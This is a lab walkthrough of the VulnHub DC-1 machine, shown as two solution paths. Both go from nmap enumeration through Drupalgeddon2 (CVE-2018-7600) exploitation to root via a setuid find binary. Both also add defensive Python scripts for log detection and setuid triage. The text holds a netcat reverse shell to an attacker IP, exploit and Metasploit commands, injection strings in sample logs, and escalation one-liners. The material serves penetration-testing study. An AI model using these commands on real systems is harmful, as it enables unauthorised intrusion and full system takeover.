DC-1 VulnHub Walkthrough: Exploiting Drupal 7 & Privilege Escalation
DC-1 is a beginner-to-intermediate level vulnerable Linux machine designed to help penetration testers and OSCP aspirants practice enumeration, exploitation, and privilege escalation.
Machine Details
- Name: DC-1
- Platform: VulnHub
- Operating System: Linux (Debian 32-bit)
- Difficulty: Beginner to Intermediate
- Goal: Gain root access & capture final flag
- Key Techniques: Drupal exploitation, SUID escalation
Phase 1: Enumeration
Enumeration is the most important phase. Missing information here often breaks the entire attack chain.
Network Discovery
nmap -sn 192.168.29.0/24
The DC-1 machine is identified at: 192.168.29.236
Port & Service Enumeration
nmap -v -sT -A 192.168.29.236
-A already enables version detection (-sV), default scripts (-sC) and OS detection (-O), so listing those flags alongside it is redundant. The scan shows three open ports:
- 22/tcp: SSH
- 80/tcp: HTTP (Apache web server)
- 111/tcp: rpcbind
Phase 2: Web Enumeration
Accessing the web service reveals a Drupal-based website.
http://192.168.29.236
Vulnerability Scanning
nikto -h http://192.168.29.236
Drupal identifies itself in its responses: pages carry an X-Generator: Drupal 7 header (nmap's http-generator script reports the same), and /CHANGELOG.txt, when left in place, reveals the exact point release.
robots.txt Check
http://192.168.29.236/robots.txt
No useful entries found. This step is optional but good practice.
Phase 3: Exploiting Drupal 7
searchsploit drupal 7
Searching Exploit-DB for Drupal 7 vulnerabilities turns up Drupalgeddon2 (CVE-2018-7600, SA-CORE-2018-002): an unauthenticated remote code execution bug in the Form API that affects Drupal 7 releases before 7.58.
Download Exploit
searchsploit -m 44449
Exploit-DB entry 44449 is a Ruby script for Drupalgeddon2; searchsploit -m copies it into the current directory. Fetching https://www.exploit-db.com/exploits/44449 with wget would only return the HTML page, not the script.
Execute Exploit
ruby 44449.rb http://192.168.29.236/
The script injects Form API keys into the password reset form (/?q=user/password) and returns a command prompt running as the web server user, www-data.
Phase 4: Shell Stabilization
The prompt returned by the exploit is not a real TTY, so a proper reverse shell is opened from it.
nc -e /bin/bash 192.168.29.228 4444
Start a Netcat listener on port 4444 on the attacker machine (192.168.29.228) before running this. DC-1 ships a netcat build that supports -e, which is not the case on every target; check for it before relying on this one-liner.
Capturing the First Flag (flag1)
ls
cat flag1.txt
The shell lands in the Drupal web root (/var/www), where flag1.txt sits. Its hint points at the CMS configuration file (settings.php), which holds the next flag.
Phase 5: Privilege Escalation
Privilege escalation focuses on misconfigured binaries and permissions.
Finding SUID Binaries
find / -perm -u=s -type f 2>/dev/null
-perm -u=s (equivalently -perm -4000) lists every regular file with the setuid bit; errors for unreadable directories are discarded. Among the usual candidates (passwd, su, mount and friends), /usr/bin/find stands out: it is root-owned with the setuid bit set, which is not a default Debian configuration.
GTFOBins Exploitation
find . -exec /bin/bash -p \; -quit
find runs the -exec command with root's effective UID. The -p flag matters: without it, bash resets the effective UID to the real UID at startup and the shell drops back to www-data. GTFOBins documents the same trick with /bin/sh -p; confirm with id that the effective UID is 0.
Final Flag (Root)
cd /root
ls
cat thefinalflag.txt
Conclusion
- Network enumeration with Nmap
- Web vulnerability discovery
- Drupal 7 RCE exploitation
- Shell stabilization techniques
- SUID privilege escalation using GTFOBins
Alternative walkthrough
DC-1 Lab Solution: Step-by-Step Using Command Awareness Flow
This second solution walks the same machine with a slightly different toolchain (Metasploit instead of the standalone Ruby exploit). Each step explains why the command is used and how it advances the attack chain.
Step 1: Verify Target Is Reachable
Before scanning or exploiting, confirm the target system is alive.
ping 192.168.235.193
Successful ICMP replies confirm the DC-1 machine is online.
Step 2: Identify Open Services
A basic port scan reveals exposed services that can be enumerated further.
nmap 192.168.235.193
The scan reveals a web service, which becomes the primary entry point.
Step 3: Enumerate the Web Application
Once a web service is detected, directory and technology enumeration is performed.
feroxbuster --url http://192.168.235.193
whatweb http://192.168.235.193
The output confirms the application is running Drupal 7, which is known to have critical vulnerabilities.
Step 4: Research Known Drupal 7 Vulnerabilities
Public exploit databases are reviewed to identify relevant vulnerabilities.
searchsploit drupal 7
Known Drupal 7 exploits indicate a high probability of remote code execution.
Step 5: Exploit with Metasploit
Exploitation frameworks are commonly used in lab environments to validate vulnerable configurations. The Drupalgeddon2 module handles both Drupal 7 and Drupal 8 targets.
msfconsole
search drupalgeddon2
use exploit/unix/webapp/drupal_drupalgeddon2
show options
set RHOSTS 192.168.235.193
set LHOST <attacker_ip>
run
A successful run returns a session as the web server user (by default a PHP Meterpreter).
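As an added example for this step and for Phase 3 of the first walkthrough (it is not code from the write-up, from the Exploit-DB script, or from the Metasploit module), the following Python script shows the defender's view of the same exploit: it parses combined-format web access log lines and flags requests whose decoded query string carries Drupal Form API render-array keys, which is the injection primitive behind CVE-2018-7600. The log lines are constructed for the example, the regex assumes the Apache/nginx combined log format, and FORM_API_KEYS is an assumed list drawn from the public exploits.

```python
import re
from urllib.parse import parse_qsl

# Added example (not part of the original write-up, not code from 44449 or
# Metasploit): flag Drupalgeddon2-style requests in combined-format access logs.
# CVE-2018-7600 smuggles Form API properties (#post_render, #markup, #type, ...)
# through request parameters, so the decoded URL contains "#" inside parameter
# names or values, something legitimate Drupal traffic does not do.

COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) '
)

# Form API properties abused by the public exploits (assumed list, drawn from
# Exploit-DB 44449 for Drupal 7 and the drupal_drupalgeddon2 Metasploit module).
FORM_API_KEYS = ("#post_render", "#pre_render", "#lazy_builder",
                 "#markup", "#type", "#value")

# Constructed sample log lines for this example.
SAMPLE_LOG = [
    # benign page view
    '10.0.0.5 - - [12/May/2024:10:01:02 +0000] "GET /?q=node/1 HTTP/1.1" '
    '200 5123 "-" "Mozilla/5.0"',
    # Drupal 7 pattern used by 44449: Form API keys injected into user/password
    '10.0.0.9 - - [12/May/2024:10:01:05 +0000] "POST /?q=user/password'
    '&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23type%5D=markup'
    '&name%5B%23markup%5D=id HTTP/1.1" 200 201 "-" "Ruby"',
    # Drupal 8 pattern from the public exploits: element_parents points into #value
    '10.0.0.9 - - [12/May/2024:10:01:07 +0000] "POST /user/register'
    '?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
    ' HTTP/1.1" 200 345 "-" "python-requests/2.31"',
    # benign crawler hit
    '10.0.0.7 - - [12/May/2024:10:02:11 +0000] "GET /robots.txt HTTP/1.1" '
    '200 2313 "-" "Googlebot"',
]


def parse_combined(line):
    """Parse one combined-format line into its fields; None if it does not match."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def form_api_keys_in(target):
    """Sorted list of Form API keys found in the decoded query string of a request target."""
    _, _, query = target.partition("?")
    found = set()
    # parse_qsl percent-decodes names and values, so %23 becomes "#" before the check
    for name, value in parse_qsl(query, keep_blank_values=True):
        for key in FORM_API_KEYS:
            if key in name or key in value:
                found.add(key)
    return sorted(found)


def find_drupalgeddon2(lines):
    """One hit per request whose query string carries Form API injection keys."""
    hits = []
    for line in lines:
        rec = parse_combined(line)
        if rec is None:
            continue
        keys = form_api_keys_in(rec["target"])
        if keys:
            hits.append({"ip": rec["ip"], "method": rec["method"],
                         "target": rec["target"], "keys": keys})
    return hits


if __name__ == "__main__":
    for hit in find_drupalgeddon2(SAMPLE_LOG):
        print(hit["ip"], hit["method"], hit["keys"], hit["target"][:60])
```

Two caveats when using this on real logs: the access log records only the request line, so a variant that carries the Form API keys in a POST body (as the Drupal 8 exploit does alongside the URL above) shows up only through the element_parents/#value hint, and a proxy or WAF that logs bodies closes that gap; and detection is a stopgap, the fix is the SA-CORE-2018-002 patch (Drupal 7.58).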
Step 6: Post-Access Enumeration
After gaining access, basic system context and file locations are explored. From Meterpreter, shell drops to an OS shell and bash -i makes it interactive.
shell
bash -i
ls
cd /home/flag4
cat flag4.txt
The only home directory on the box belongs to the user flag4; flag4.txt points at the remaining flag under /root.
Step 7: Automated CMS Enumeration (Optional Validation)
Automated tools can validate findings and identify misconfigurations. droopescan (https://github.com/SamJoan/droopescan) installs from PyPI, or can be run from a git checkout once its requirements are installed.
pip install droopescan
droopescan scan drupal -u http://192.168.235.193
The scan confirms the Drupal attack surface already identified manually.
Step 8: Search for SUID Privilege Escalation Vectors
With user-level access established, the focus shifts to privilege escalation.
find / -perm -4000 2>/dev/null
The output reveals /usr/bin/find running with SUID permissions.
Step 9: Escalate Privileges Using GTFOBins Logic
SUID-enabled binaries are checked against public references such as GTFOBins.
The find binary runs whatever -exec names with root's effective UID, so it can spawn a shell.
/usr/bin/find . -exec /bin/sh \; -quit
Confirm with id that the effective UID is 0. If you spawn bash instead of /bin/sh, pass -p, otherwise bash drops the elevated effective UID at startup.
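Steps 8 and 9 here and Phase 5 of the first walkthrough both boil down to: list setuid files, then decide which ones matter. As an added example (not code from the write-up or from GTFOBins), the Python script below does the listing the way find -perm -4000 -type f does, then sorts the results into binaries that are normal for the distro, binaries GTFOBins lists as directly abusable when setuid, and everything else that needs a manual look. BASELINE_SUID and GTFOBINS_SUID are assumed, illustrative lists, and make_fixture() builds a constructed directory tree with a setuid find in it so the script runs without a target.

```python
import os
import stat
import sys
import tempfile

# Added example (not part of the original write-up): enumerate setuid files
# like `find / -perm -4000 -type f 2>/dev/null`, then triage them by name.
# Both lists below are illustrative assumptions; build a real baseline from
# a clean install of the same distribution release as the target.

# setuid-root binaries normally present on a Debian system (assumed baseline)
BASELINE_SUID = {"passwd", "su", "sudo", "mount", "umount", "chsh", "chfn",
                 "gpasswd", "newgrp", "ping", "ping6"}

# binaries with a GTFOBins SUID entry: setuid root on any of these is a direct escalation
GTFOBINS_SUID = {"find", "vim", "nmap", "python", "perl", "bash", "env",
                 "awk", "less", "tee", "cp"}


def find_suid(root):
    """Sorted (path, owner_uid) pairs for regular files under root with the setuid bit."""
    results = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks, like -type f
            except OSError:
                continue  # unreadable entry, the equivalent of 2>/dev/null
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                results.append((path, st.st_uid))
    return sorted(results)


def triage(root):
    """Classify setuid files by basename into gtfobins, expected (baseline) or review."""
    report = {"gtfobins": [], "expected": [], "review": []}
    for path, _uid in find_suid(root):
        # owner is reported by find_suid but not used here: setuid to a non-root
        # user is a lateral move rather than root, so check it by hand
        base = os.path.basename(path)
        if base in GTFOBINS_SUID:
            report["gtfobins"].append(path)
        elif base in BASELINE_SUID:
            report["expected"].append(path)
        else:
            report["review"].append(path)
    return report


def make_fixture():
    """Constructed directory tree standing in for a target filesystem (DC-1-like setuid find)."""
    root = tempfile.mkdtemp(prefix="suid-demo-")
    layout = {
        "usr/bin/find": 0o4755,          # the DC-1 misconfiguration
        "usr/bin/passwd": 0o4755,        # expected setuid binary
        "usr/bin/ls": 0o755,             # not setuid, must be ignored
        "usr/local/bin/backup": 0o4750,  # custom setuid binary: review it
    }
    for rel, mode in layout.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(b"#!/bin/sh\n")
        os.chmod(path, mode)  # an unprivileged owner may set the setuid bit on its own file
    return root


if __name__ == "__main__":
    scan_root = sys.argv[1] if len(sys.argv) > 1 else make_fixture()
    for bucket, paths in triage(scan_root).items():
        for p in paths:
            print(f"{bucket:9} {p}")
```

Run it with / as the argument on a box where Python is available, or without arguments to see the fixture classified. On a real target the native find command is faster than walking the tree in Python; the value of the script is the triage step, which turns a long list into the one or two entries (here /usr/bin/find) worth checking against GTFOBins.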
Step 10: Confirm Root Access & Capture Final Flag
cd /root
ls
cat thefinalflag.txt
Final Learning Summary
- Enumeration drives the entire attack chain
- Drupal 7 is a critical-risk CMS if unpatched
- Frameworks validate real-world misconfigurations
- SUID binaries are high-impact escalation vectors
- GTFOBins is essential for Linux privilege escalation